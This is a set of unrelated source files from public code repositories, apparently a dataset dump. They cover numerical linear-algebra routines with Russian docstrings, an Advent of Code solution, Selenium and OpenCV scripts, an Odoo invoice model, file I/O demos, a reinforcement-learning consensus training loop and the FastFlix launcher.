путь до файла .csv\n\n Returns\n -------\n data : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, импортированная из csv\n\n \"\"\"\n with open(filename, 'r') as f:\n reader = csv.reader(f)\n data = list(reader)\n for i in range(len(data)):\n for j in range(len(data[0])):\n data[i][j] = eval(data[i][j])\n return data\n \n\ndef slau_outp_matr(a):\n \"\"\"\n Функция для вывода матрицы\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n\n \"\"\"\n for i in range(len(a)): \n print(f'{a[i]}') \n\ndef det(a):\n \"\"\"\n Функция вычисляет определитель матрицы.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, определитель которой нужно вычислить.\n\n Raises\n ------\n ValueError\n Возникает, если введённая матрица a не квадратная\n\n Returns\n -------\n summ : float\n Определитель матрицы\n\n \"\"\"\n if len(a) != len(a[0]):\n raise ValueError('Матрица должна быть квадратная') \n for i in range(len(a)):\n summ = 0\n if len(a) == 1:\n summ += a[0][0]\n return summ\n else:\n for k in range(len(a)):\n b = copy.deepcopy(a)\n b.pop(0)\n for j in range(len(b)):\n b[j].pop(k)\n summ += 
det(b)*((-1)**k)*int(a[0][k])\n return summ\n \n \ndef matrix_of_coefficients_is_square(a):\n \"\"\"\n Функция показывает, является ли матрица квадртной.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n bool\n True - если матрица квадратная; \n False - иначе\n\n \"\"\"\n if len(a)+1 == len(a[0]):\n return True \n return False\n\ndef norma(matr):\n \"\"\"\n Функция вычисляет бесконечную норму матрицы.\n\n Parameters\n ----------\n matr : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n float\n Максимальная из сумм всех столбцов - норма матрицы\n\n \"\"\"\n matr = np.array(matr)\n return matr.sum(axis=0).max()\n\n\n\ndef ab(matr):\n \"\"\"\n Функция разбивает введенную пользователем матрицу на две.\n\n Parameters\n ----------\n matr : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введенная пользователем\n\n Returns\n -------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Квадратная матрица - левая часть введенной\n b : [float, float, ...]\n Правый столбец введенной матрицы\n\n \"\"\"\n a = []\n b = []\n for i in range(len(matr)):\n a.append([])\n for j in range(len(matr[0])-1):\n a[i].append(matr[i][j])\n for i in range(len(matr)):\n b.append(matr[i][len(matr)])\n return a,b\n\n\n\ndef fix_diagonal(A):\n \"\"\"\n Функция преобразовывает матрицу таким образом, чтобы на главной диагонали не было нулей.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введённая пользователем\n\n Returns\n -------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Преобразованная матрица A без 0 на главной диагонали\n\n \"\"\"\n for i in range(len(A)):\n if (A[i][i] == 0):\n for j in range(len(A)):\n if A[j][i] != 0:\n for k in range(len(A) + 1):\n A[i][k] -= A[j][k]\n break\n return A\n\n\n\ndef iakobi(A):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Якоби.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица, введённая пользователем\n\n Returns\n -------\n A: [[float, float, ...],\n [float, float, ...],\n ...]\n Матрица коэффициентов изначальной матрицы A\n x: [float, float, ...]\n Список решений системы\n [[float, float, ...],\n [float, float, ...],\n ...]\n Обратная матрица для матрицы A\n \n \"\"\" \n B = []\n for i in range(len(A)):\n B.append([])\n B[i].append(A[i][-1])\n\n B1 = []\n for i in range(len(A)):\n B1.append(A[i][-1])\n for i in range(len(A)):\n A[i].pop(-1)\n tempx = [0 for i in range(len(A))]\n e = float(input('Введите эпсилон: '))\n x=[0 for i in range(0,len(A))]\n flag = True\n count = 0 \n while flag == True or count>100:\n for i in range(len(A)): \n tempx[i] = B1[i]\n count +=1\n for j in range(len(A[i])):\n if i!=j:\n count +=1\n tempx[i] -= A[i][j]*x[j]\n tempx[i]/=A[i][i]\n count +=1\n flag = False\n for k in range(len(A)):\n if abs(x[k]-tempx[k])>=e:\n flag = True\n x[k] = tempx[k]\n if count > 100:\n break\n else:\n return A, x, np.linalg.inv(A), False\n\n return A, x, np.linalg.inv(A), True\n\n\n\ndef jdmethod(a, b):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Жордана-Гаусса.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Квадратная матрица - левая часть изначальной\n b : [float, float, ...]\n Правый столбец изначальной матрицы\n\n Returns\n -------\n b : [float, float, ...]\n Список решений системы\n a_orig : 
[[float, float, ...],\n float, float, ...],\n ...]\n Изначальная квадратная матрица\n\n \"\"\"\n a = np.array(a, float)\n a_orig = copy.deepcopy(a)\n b = np.array(b, float)\n n = len(b)\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,n):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n b[k],b[i] = b[i],b[k]\n break\n pivot = a[k,k]\n for j in range(k,n):\n a[k,j] /= pivot\n b[k] /= pivot\n for i in range(n):\n if i == k or a[i,k] == 0: continue\n factor = a[i,k]\n for j in range(k,n):\n a[i,j] -= factor * a[k,j]\n b[i] -= factor * b[k]\n \n return b, a_orig\n\n\n\ndef linang_inv_jdmethod(a):\n \"\"\"\n Функция находит обратную матрицу для введённой с помощью метода Жордана-Гаусса.\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Изначальная матрица\n\n Returns\n -------\n [[float, float, ...],\n [float, float, ...],\n ...]\n Обратная матрица для введённой\n\n \"\"\"\n a = np.array(a, float)\n e = np.eye(len(a))\n a = np.concatenate((a, e), axis=1)\n n = len(a)\n m = len(a[0])\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,m):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n break\n\n pivot = a[k,k]\n for j in range(k,m):\n a[k,j] /= pivot\n\n for i in range(n):\n if i == k or a[i,k] == 0: continue\n factor = a[i,k]\n for j in range(k,m):\n a[i,j] -= factor * a[k,j]\n\n return a[:, n:]\n\n\n\ndef fraction_jbmethod(a):\n \"\"\"\n Функция находит решение системы линейных уравнений методом Жордана-Гаусса,\n используя тип данных fraction\n\n Parameters\n ----------\n a : [[float, float, ...],\n [float, float, ...],\n ...]\n Изначальная матрица\n\n Returns\n -------\n x :[float, float, ...]\n Список решений системы\n\n \"\"\"\n # Создание массива numpy размера n и инициализация нулем для хранения вектора решения\n n = len(a)\n x = np.zeros(n)\n\n # Чтение коэффициентов расширенной матрицы\n for i in range(n):\n for j in range(n+1):\n a[i][j] = Fraction(a[i][j])\n\n # Применение Метода Жордана-Гаусса\n for k in range(n):\n if np.fabs(a[k,k]) < 1.0e-12:\n for i in range(k+1,n):\n if np.fabs(a[i,k]) > np.fabs(a[k,k]):\n for j in range(k,n+1):\n a[k,j],a[i,j] = a[i,j],a[k,j]\n break\n\n for j in range(n):\n if k != j:\n ratio = a[j][k]/a[k][k]\n\n for l in range(n+1):\n a[j][k] = a[j][l] - ratio * a[k][l]\n\n # Получе��ие решения\n for i in range(n):\n x[i] = a[i][n]/a[i][i]\n\n return x\n\n\ndef isdegenerate(A):\n \"\"\"\n Функция проверяет, есть ли решения у введённой системы уравнений.\n\n Parameters\n ----------\n A : [[float, float, ...],\n [float, float, ...],\n ...]\n Введённая матрица\n\n Returns\n -------\n bool\n False - матрица не является вырожденной, корни есть.\n True - матрица вырожденная, либо не является квадратной, корней быть не может.\n\n \"\"\"\n # ВВОД МАТРИЦЫ И ПРОВЕРКА НА ВЫРОЖДЕННОСТЬ \n matr = np.array(A)\n \n DELTA = 0.01\n \n flag = True # решение существует\n if matrix_of_coefficients_is_square(matr):\n a = ab(matr)[0]\n numpy_det = np.linalg.det(a)\n if abs(numpy_det) <= DELTA:\n my_own_det = det(a)\n if abs(my_own_det) <= DELTA:\n flag = False\n else:\n flag = True\n else:\n flag = True\n \n if flag:\n return False\n else:\n return True #матрица вырожденная, единого решения не существует\n else:\n return True #Матрица коэффициентов не является 
квадратной","repo_name":"dthseemsbttr/numericmethodsdths","sub_path":"nummethvera/slau.py","file_name":"slau.py","file_ext":"py","file_size_in_byte":13681,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"10356078234","text":"from aocd import data\nfrom aocd.models import Puzzle\n\ndef atobit(ch)->int:\n return int(\"1\"+\"0\"*(ord(ch) - ord('a')), 2)\n\ndef countone(num:int)->int:\n str()\nclass Segments:\n def __init__(self, str):\n self.mapping = {}\n inputs = sorted(str[:-1].split(\" \"), key=lambda x:len(x))\n input_bitmap = [0]*10\n for index, input in enumerate(inputs):\n for ch in sorted(input):\n input_bitmap[index] += atobit(ch)\n self._gen_map(input_bitmap)\n\n def relocation(self, alphabet):\n bits = 0\n for ch in alphabet:\n bits |= atobit(ch)\n return self.mapping[bits]\n def alloc(self, bitmap, digit):\n self.mapping[bitmap] = digit\n \n def reverse_map(self, digit):\n return list(self.mapping.keys())[list(self.mapping.values()).index(digit)]\n def _gen_map(self, bitmap):\n self.mapping[bitmap[0]] = 1\n self.mapping[bitmap[1]] = 7\n self.mapping[bitmap[2]] = 4\n self.mapping[bitmap[-1]] = 8\n for len_5 in bitmap[3:6]:\n if len_5 & self.reverse_map(1) == self.reverse_map(1):\n self.mapping[len_5] = 3\n elif bin(len_5 & self.reverse_map(4))[1:].count('1') == 2:\n self.mapping[len_5] = 2\n else:\n self.mapping[len_5] = 5\n\n for len_6 in bitmap[6:9]:\n if len_6 & self.reverse_map(4) == self.reverse_map(4):\n self.mapping[len_6] = 9\n elif len_6 & self.reverse_map(1) == self.reverse_map(1):\n self.mapping[len_6] = 0\n else:\n self.mapping[len_6] = 6\n\npuzzle = Puzzle(year=2021, day=8)\ninput_str = puzzle.input_data\n# input_str=\"\"\"be cfbegad cbdgef fgaecd cgeb fdcge agebfd fecdb fabcd edb | fdgacbe cefdb cefbgd gcbe\n# edbfga begcd cbg gc gcadebf fbgde acbgfd abcde gfcbed gfec | fcgedb cgb dgebacf gc\n# fgaebd cg bdaec gdafb agbcfd gdcbef bgcad gfac gcb cdgabef | cg cg fdcagb cbg\n# fbegcd cbd adcefb dageb afcb bc aefdc ecdab fgdeca fcdbega | efabcd cedba gadfec cb\n# aecbfdg fbg gf bafeg dbefa fcge gcbea fcaegb dgceab fcbdga | gecf egdcabf bgf bfgea\n# fgeab ca afcebg bdacfeg cfaedg gcfdb baec bfadeg bafgc acf | gebdcfa ecba ca fadegcb\n# dbcfg fgd bdegcaf fgec aegbdf ecdfab fbedc dacgb gdcebf gf | cefg dcbef fcge gbcadfe\n# bdfegc cbegaf gecbf dfcage bdacg ed bedf ced adcbefg gebcd | ed bcgafe cdgba cbgef\n# egadfb cdbfeg cegd fecab cgb gbdefca cg fgcdab egfdb bfceg | gbdfcae bgc cg cgb\n# gcafb gcf dcaebfg ecagb gf abcdeg gaef cafbge fdbac fegbdc | fgae cfgab fg bagce\"\"\"\n\npart1_score = 0\npart2_score = 0\ndata = input_str.split(\"\\n\")\nfor d in data:\n outputs = d.split(\"|\")[1]\n seg = Segments(d.split(\"|\")[0])\n s = \"\"\n for output in outputs[1:].split(\" \"):\n out = seg.relocation(output)\n if out in [1,4,7,8]:\n part1_score += 1\n s += str(out)\n part2_score += int(s)\n\nprint(part1_score, part2_score)","repo_name":"Hacker-s-In-inTrusion/advent-of-code-solve","sub_path":"2021/ChoKyuWon/day8.py","file_name":"day8.py","file_ext":"py","file_size_in_byte":2939,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"27319527576","text":"import logging\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.service import Service\nimport Method_Module\n\nService_obj = Service(\"C:\\chromedriver.exe\")\ndriver = 
webdriver.Chrome(service=Service_obj)\ndriver.implicitly_wait(10)\ndriver.maximize_window()\ndriver.get(\"https://www.amazon.in/\")\n\nlogger = logging.getLogger(__name__)\nfilehandler = logging.FileHandler(\"Amazon_logfile.log\")\nformatter = logging.Formatter(\"%(asctime)s : %(levelname)s : %(name)s : %(message)s\")\nfilehandler.setFormatter(formatter)\nlogger.addHandler(filehandler)\nlogger.setLevel(logging.DEBUG)\n\n\ndef test_signin_verification():\n Method_Module.login(driver, logger) #-------sign in procedure---------\n Method_Module.account_verify(driver, logger) #------- account varification----------\n\n\ndef test_cart_itemdelete():\n Method_Module.cart_itemdelete(driver, logger) #------- add to cart check and delete previous items----------\n\n\ndef test_mobile_purchase():\n Method_Module.amazon_Home(driver, logger) #----- Amazon home page-----\n Method_Module.mobile(driver, logger) #----- Selection of mobile ------\n Method_Module.cart_productVerification(driver, logger) #------ Cart Product Verification-----\n","repo_name":"Shashank2se/Project1_Amazon_verify","sub_path":"test_Amazon.py","file_name":"test_Amazon.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"23600043226","text":"import cv2\nimport numpy as np\nprint(cv2.__version__)\ncount = 1\nfor index in range(1, 12):\n vidcap = cv2.VideoCapture('manato_card_raw_data_set/masato_%d.mp4' % index)\n success,image = vidcap.read()\n success = True\n\n fps = vidcap.get(cv2.CAP_PROP_FPS)\n est_video_length_minutes = round(1) # Round up if not sure.\n est_tot_frames = est_video_length_minutes * 24 * fps # Sets an upper bound # of frames in video clip\n\n n = 10 # Desired interval of frames to include\n # get frame by skip n frame\n desired_frames = n * np.arange(est_tot_frames) \n for i in desired_frames:\n if i%9==0:\n vidcap.set(1,i-1) \n success,image = vidcap.read(1) \n if success != True:\n break\n height, width = image.shape[:2] # image is an array of array of [R,G,B] values\n img_resize = cv2.resize(image, (width/5, height/5), interpolation = cv2.INTER_AREA)\n \n cv2.imwrite(\"data_sets/masato/masato%d.jpg\" % count , img_resize)\n count += 1\n\n # get frame by frame\n\n # while success:\n # height, width = image.shape[:2] # image is an array of array of [R,G,B] values\n # img_resize = cv2.resize(image, (width/5, height/5), interpolation = cv2.INTER_AREA)\n # cv2.imwrite(\"data_sets/kondo/kondo%d.jpg\" % count, img_resize) # save frame as JPEG file\n # success,image = vidcap.read()\n # print 'Read a new frame: ', success\n # count += 1\n\n vidcap.release()\n \n","repo_name":"Thoi-Duong/image_cutter_script","sub_path":"video_cuter.py","file_name":"video_cuter.py","file_ext":"py","file_size_in_byte":1459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"5516488635","text":"from odoo import api, fields, models\nfrom datetime import timedelta\nimport math\n\n\nclass AccountInvoiceLine(models.Model):\n _inherit = \"account.invoice.line\"\n\n def _prepare_membership_line(self, invoice, product, price_unit, line_id,\n qty=1.0):\n qty = int(math.ceil(qty))\n date_from = fields.Date.from_string(\n invoice.date_invoice or fields.Date.today())\n date_to = (product.product_tmpl_id._get_next_date(date_from, qty=qty) -\n timedelta(days=1))\n return {\n 'partner': invoice.partner_id.id,\n 'membership_id': product.id,\n 'member_price': price_unit,\n 'date': 
invoice.date_invoice or fields.Date.today(),\n 'date_from': fields.Date.to_string(date_from),\n 'date_to': fields.Date.to_string(date_to),\n 'state': 'waiting',\n 'account_invoice_line': line_id,\n }\n\n @api.multi\n def write(self, vals):\n \"\"\"Create before the lines of membership with variable period.\"\"\"\n memb_line_model = self.env['membership.membership_line']\n if any(x in vals for x in ['product_id', 'quantity', 'invoice_id']):\n for line in self:\n product = (\n self.env['product.product'].browse(vals['product_id']) if\n vals.get('product_id') else line.product_id)\n invoice = (\n self.env['account.invoice'].browse(vals['invoice_id']) if\n vals.get('invoice_id') else line.invoice_id)\n if (invoice.type == 'out_invoice' and\n product.membership and\n product.membership_type == 'variable'):\n quantity = float(vals.get('quantity', line.quantity))\n price_unit = vals.get('price_unit', line.price_unit)\n membership_vals = self._prepare_membership_line(\n invoice, product, price_unit, line.id, qty=quantity)\n if line.membership_lines:\n if len(line.membership_lines) > 1: # pragma: no cover\n # Remove all except last one,\n # only one membership line per invoice line\n line.membership_lines[:-1].unlink()\n # Update with changes\n line.membership_lines[0].write(membership_vals)\n else:\n # Create membership line\n memb_line_model.create(membership_vals)\n return super(AccountInvoiceLine, self).write(vals)\n\n @api.model\n def create(self, vals):\n price_unit = vals.get('price_unit', 0.0)\n line = super(AccountInvoiceLine, self).create(vals)\n if (line.invoice_id.type == 'out_invoice' and\n line.product_id.membership and\n line.product_id.membership_type == 'variable'):\n qty = float(line.quantity)\n membership_vals = self._prepare_membership_line(\n line.invoice_id, line.product_id, price_unit, line.id, qty=qty)\n # There's already the super line\n line.membership_lines[0].write(membership_vals)\n return line\n","repo_name":"decodio/oca12","sub_path":"membership_variable_period/models/account_invoice.py","file_name":"account_invoice.py","file_ext":"py","file_size_in_byte":3293,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"6990592330","text":"import cv2\nimport numpy as np\nfrom dataPath import DATA_PATH\n\nimg = cv2.imread(DATA_PATH+\"images/gaussian-noise.png\")\n\n# Check for invalid input\nif img is None:\n print(\"Could not open or find the image\")\n\n# diameter of the pixel neighbourhood used during filtering\ndia=15;\n\n# Larger the value the distant colours will be mixed together\n# to produce areas of semi equal colors\nsigmaColor=80\n\n# Larger the value more the influence of the farther placed pixels\n# as long as their colors are close enough\nsigmaSpace=80\n\n#Apply bilateralFilter\nresult = cv2.bilateralFilter(img, dia, sigmaColor, sigmaSpace)\n\ncv2.imshow(\"Original Image\", img)\ncv2.waitKey(0)\ncv2.imshow(\"Bilateral Blur Result\", result)\ncv2.waitKey(0)\n","repo_name":"mariamonzon/ComputerVisionOpenCV","sub_path":"4-ImageEnhancementFiltering/bilateralBlur.py","file_name":"bilateralBlur.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"4654077899","text":"from ..base import BaseCurrency\n\n__author__ = \"Artur Barseghyan\"\n__copyright__ = \"2021 Artur Barseghyan\"\n__license__ = \"GPL-2.0-only OR LGPL-2.1-or-later\"\n__all__ = (\"NIO\",)\n\n\nclass NIO(BaseCurrency):\n \"\"\"NIO - Nicaraguan 
córdoba.\"\"\"\n\n uid: str = \"NIO\"\n rate: int = 100\n","repo_name":"barseghyanartur/valuta","sub_path":"src/valuta/currencies/nio.py","file_name":"nio.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"50"} +{"seq_id":"26259436978","text":"#%%\nimport pandas as pd\nimport dvc.api\nfrom tqdm import tqdm\nfrom openai.embeddings_utils import get_embedding\nimport json\n\ndf = pd.concat([\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch1.csv'),\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch2.csv'),\n pd.read_csv('../../data/wish_attr_extract_label/appen/input_batch_processed/appen_product_attribution_batch3.csv'),\n])\n\ndf['text'] = 'Product Title: ' + df['title'].astype(str) + ' ; ' + 'Product Description: ' + df['product_description'].astype(str)\ndf['text'] = df['text'].apply(lambda x: x.replace('\\n', ' '))\n#%%\nengine = 'text-embedding-ada-002'\nwith open('appen_tolabel_product_attr_leftover.json', 'a') as f:\n for d in tqdm(df.to_dict('records')):\n try:\n i = {\n 'openai_embedding': get_embedding(d['text'], engine=engine),\n 'text': d['text'],\n 'product_id': d['product_id'],\n 'label_ordering': d['label_ordering']\n }\n f.write(json.dumps(i) + '\\n')\n except Exception as e:\n print(f\"text: {d['text']} ; exception: {e}\")","repo_name":"kpister/prompt-linter","sub_path":"data/scraping/repos/jiwen-wish~multitask-llm-rnd-test/datasets~notebooks~openai_embedding~write_appen_product_embedding_to_file.py","file_name":"datasets~notebooks~openai_embedding~write_appen_product_embedding_to_file.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"31760443935","text":"#!/usr/bin/env python\n# coding=utf-8\n\nimport os\nimport inspect\n\n\ndef remove_if_possible(file_name):\n if os.path.exists(file_name):\n os.remove(file_name)\n\n\ndef prompt_to_remove(file_name):\n prompt = 'We will remove \\'' + file_name + '\\' file, y/n?'\n confirm = ('y', 'yes')\n cancel = ('n', 'no')\n choice = confirm + cancel\n\n user_input = ''\n while not (user_input in choice):\n user_input = input(prompt).lower()\n\n if user_input in confirm:\n remove_if_possible(file_name)\n break\n elif user_input in cancel:\n break\n\n\ndef read_file_with_try(file_name):\n print('\\n---- from', inspect.currentframe().f_code.co_name)\n f = None\n try:\n f = open(file_name, 'r')\n print(f.read())\n except IOError as an_error:\n print(an_error)\n finally:\n if f:\n f.close()\n\n\ndef read_file_with_with(file_name):\n print('\\n---- from', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name, 'r') as f:\n print(f.read())\n except IOError as an_error:\n print(an_error)\n\n\ndef create(file_name):\n try:\n f = open(file_name, 'x')\n f.write('Hello, World!')\n f.close()\n except IOError as an_error:\n print(an_error)\n finally:\n if f:\n f.close()\n\n\ndef update_to_multiple(file_name):\n print('\\nIn', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name, 'w') as f:\n f.seek(0, os.SEEK_SET)\n\n numbers = ('One', 'Two', 'Three', 'Four', 'Five', 'Enh, this is multiple line file')\n string = ''\n for number in numbers:\n string = string + number\n if number != numbers[-1]:\n string = string + '\\n'\n\n f.writelines(string)\n except IOError as an_error:\n print(an_error)\n\n\ndef 
read_file_line(file_name):\n print('\\nIn', inspect.currentframe().f_code.co_name)\n try:\n with open(file_name) as file:\n print('---- read line ----')\n count = 3\n while count > 0:\n count -= 1\n\n print('current position', file.tell())\n print(file.readline())\n\n print()\n print('---- read lines default ----')\n print('current position', file.tell())\n print(file.readlines())\n\n hint = 10\n print('\\ncurrent position', file.tell())\n pos = os.SEEK_SET\n print('move to', pos, file.seek(0, os.SEEK_SET))\n print('read lines', hint)\n print(file.readlines(hint))\n except IOError as an_error:\n print(an_error)\n\n\ndef read_png_if_possible():\n print('\\nIn', inspect.currentframe().f_code.co_name)\n\n file_name = 'python.png'\n try:\n with open(file_name, 'r') as file:\n print('---- open as \\'r\\' mode ----')\n print(file.read())\n except (IOError, UnicodeDecodeError) as an_error:\n print(an_error)\n\n print()\n try:\n with open(file_name, 'rb') as file:\n print('---- open as \\'rb\\' mode ----')\n print(file.read())\n except (IOError, UnicodeDecodeError) as an_error:\n print(an_error)\n\n\n# main business logic\nFILE_NAME = 'test.txt'\n\n# try style\nremove_if_possible(FILE_NAME)\nread_file_with_try(FILE_NAME)\ncreate(FILE_NAME)\nread_file_with_try(FILE_NAME)\n\n# with style\nremove_if_possible(FILE_NAME)\nread_file_with_with(FILE_NAME)\ncreate(FILE_NAME)\nread_file_with_with(FILE_NAME)\n\n# multiple line\nupdate_to_multiple(FILE_NAME)\nread_file_with_with(FILE_NAME)\nread_file_line(FILE_NAME)\n\n\n# PNG file\nread_png_if_possible()\n\n# finish work\nprompt_to_remove(FILE_NAME)\n","repo_name":"stonewin540/python.python3-hello-world","sub_path":"IO/fileIO.py","file_name":"fileIO.py","file_ext":"py","file_size_in_byte":3726,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"21208609585","text":"from imageai.Detection import ObjectDetection\nimport os\nimport cv2\nexecution_path = os.getcwd()\n\ndetector = ObjectDetection()\ndetector.setModelTypeAsYOLOv3()\ndetector.setModelPath( os.path.join(execution_path , \"yolo.h5\"))\ndetector.loadModel()\n# detections = detector.detectObjectsFromImage(input_image=os.path.join(execution_path , \"images/img.jpg\"), output_image_path=os.path.join(execution_path , \"imagenew.jpg\"), minimum_percentage_probability=30)\n\n# for eachObject in detections:\n# print(eachObject[\"name\"] , \" : \", eachObject[\"percentage_probability\"], \" : \", eachObject[\"box_points\"] )\n# print(\"--------------------------------\")\n\nfor image_name in os.listdir(\"dataset3/casual\"):\n \n slot1 = cv2.imread(os.path.join(\"dataset3/casual\",image_name))\n print(os.path.join(\"dataset3/casual\",image_name))\n detections = detector.detectObjectsFromImage(\n input_image=os.path.join(execution_path,\"dataset3/casual\",image_name),\n output_image_path=os.path.join(execution_path, \"out.jpg\"))\n print(detections)\n if detections:\n c = 0\n for eachObject in detections:\n print(eachObject[\"name\"], \" : \", eachObject[\"percentage_probability\"])\n print(eachObject)\n if eachObject[\"name\"] == \"person\":\n box = eachObject[\"box_points\"]\n for k in range(len(box)):\n if box[k] < 0:\n box[k] = 0\n img = slot1[box[1]:box[3], box[0]:box[2]]\n cv2.imwrite(\"croped/train/informal2/{}-{}.jpg\".format(image_name,c),img)\n c += 1\n # cv2.imshow(\"window\", img)\n # cv2.waitKey(0) 
\n","repo_name":"aayushrai/Dress_Code_Monitoring_System","sub_path":"Dress_code_classifier_model/extractPedestrian.py","file_name":"extractPedestrian.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"42943675049","text":"import numpy as np \nimport torch\nfrom environment_and_agent_utils import getActionSpace, giveReward, honestPartiesCommit, updateStates, initStatesandAgents\n# Functions used by the main.py training loop\n\ndef run_iters(params, honest_curr_temperature, \n byz_curr_temperature, honest_policy, byz_policy, oneHotStateMapper, device):\n curr_ep_trajectory_logs = []\n satisfied_constraints = []\n epoch_honest_reward = 0\n epoch_byz_reward = 0\n\n hit_max_round_len = 0\n avg_round_len = 0\n\n for round_in_ep in range(params['rounds_per_epoch']):\n #run the environment. \n\n single_run_trajectory_log = dict()\n\n #initialize the values and which agents are byzantine. \n # agent_list is all agents, honest and byzantine are subsets. \n agent_list, honest_list, byzantine_list = initStatesandAgents(params, honest_policy, byz_policy)\n\n round_counter = 0\n #until honest parties commit values (simulation terminates)\n while not honestPartiesCommit(honest_list):\n # choose new actions: \n for agent in agent_list: \n if agent.isByzantine: \n curr_temperature = byz_curr_temperature\n else: \n curr_temperature = honest_curr_temperature\n\n if type(agent.committed_value) is int: # dont change to True! Either it is False or a real value. \n action, action_logprob = agent.action, None\n else:\n if round_counter>params['max_round_len']: # force the honest agents to commit to a value. \n action, action_logprob = agent.chooseAction(oneHotStateMapper, curr_temperature, device, forceCommit=True)\n else: \n action, action_logprob = agent.chooseAction(oneHotStateMapper, curr_temperature, device)\n \n # log the current state and action\n try: \n single_run_trajectory_log['Byz-'+str(agent.isByzantine)+'_agent-'+str(agent.agentID)].append( (round_counter, agent.state, action, action_logprob ))\n except: \n single_run_trajectory_log['Byz-'+str(agent.isByzantine)+'_agent-'+str(agent.agentID)] = [ (round_counter, agent.state, action, action_logprob) ]\n\n # resolve the new states: \n #for agent in agent_list: \n updateStates(params, agent_list)\n\n # keep making more actions, storing all \n # of them along with the states and rewards\n if round_counter> params['max_round_len']:\n hit_max_round_len +=1\n\n round_counter+=1\n\n avg_round_len += round_counter\n\n # upon termination, calculate the terminal reward:\n # currently just checking if the agents satisfied consistency and validity\n # recieves a tuple of the form honest reward, byzantine reward\n reward, satisfied_constraints_this_iter = giveReward(params, honest_list, single_run_trajectory_log)\n\n epoch_honest_reward += reward[0]\n epoch_byz_reward += reward[1]\n #print('reward for iter:', reward)\n\n # storing in loggers\n satisfied_constraints.append(satisfied_constraints_this_iter)\n single_run_trajectory_log['reward'] = reward\n curr_ep_trajectory_logs.append(single_run_trajectory_log)\n\n #total_trajectory_logs.append(curr_ep_trajectory_logs[-1] )\n \n return curr_ep_trajectory_logs, satisfied_constraints, epoch_honest_reward, epoch_byz_reward, hit_max_round_len, avg_round_len\n\ndef temp_annealer(params, honest_curr_temperature, byz_curr_temperature):\n if params['use_heat_jumps']:\n honest_curr_temperature = 
honest_curr_temperature*params['temp_anneal'] # anneal the temperature for selecting actions over time. \n if honest_curr_temperatureparams['temp_fix_point']: # only decrease temp if it is above threshold\n honest_curr_temperature = honest_curr_temperature*params['temp_anneal']\n if byz_curr_temperature>params['temp_fix_point']:\n byz_curr_temperature=byz_curr_temperature*params['temp_anneal']\n return honest_curr_temperature, byz_curr_temperature\n\n","repo_name":"TrentBrick/LearningConsensus","sub_path":"train_funcs.py","file_name":"train_funcs.py","file_ext":"py","file_size_in_byte":4531,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"50"} +{"seq_id":"18814797303","text":"# -*- coding: utf-8 -*-\nimport sys\nimport traceback\nfrom multiprocessing import freeze_support\n\nfrom fastflix.entry import main\n\n\ndef start_fastflix():\n exit_code = 2\n portable_mode = True\n try:\n from fastflix import portable\n except ImportError:\n portable_mode = False\n\n if portable_mode:\n print(\"PORTABLE MODE DETECTED: now using local config file and workspace in same directory as the executable\")\n\n try:\n exit_code = main(portable_mode)\n except Exception:\n traceback.print_exc()\n input(\n \"Error while running FastFlix!\\n\"\n \"Plese report this issue on https://github.com/cdgriffith/FastFlix/issues (press any key to exit)\"\n )\n except KeyboardInterrupt:\n pass\n finally:\n sys.exit(exit_code)\n\n\nif __name__ == \"__main__\":\n freeze_support()\n start_fastflix()\n","repo_name":"cdgriffith/FastFlix","sub_path":"fastflix/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":967,"dataset":"github-code","pt":"50"} 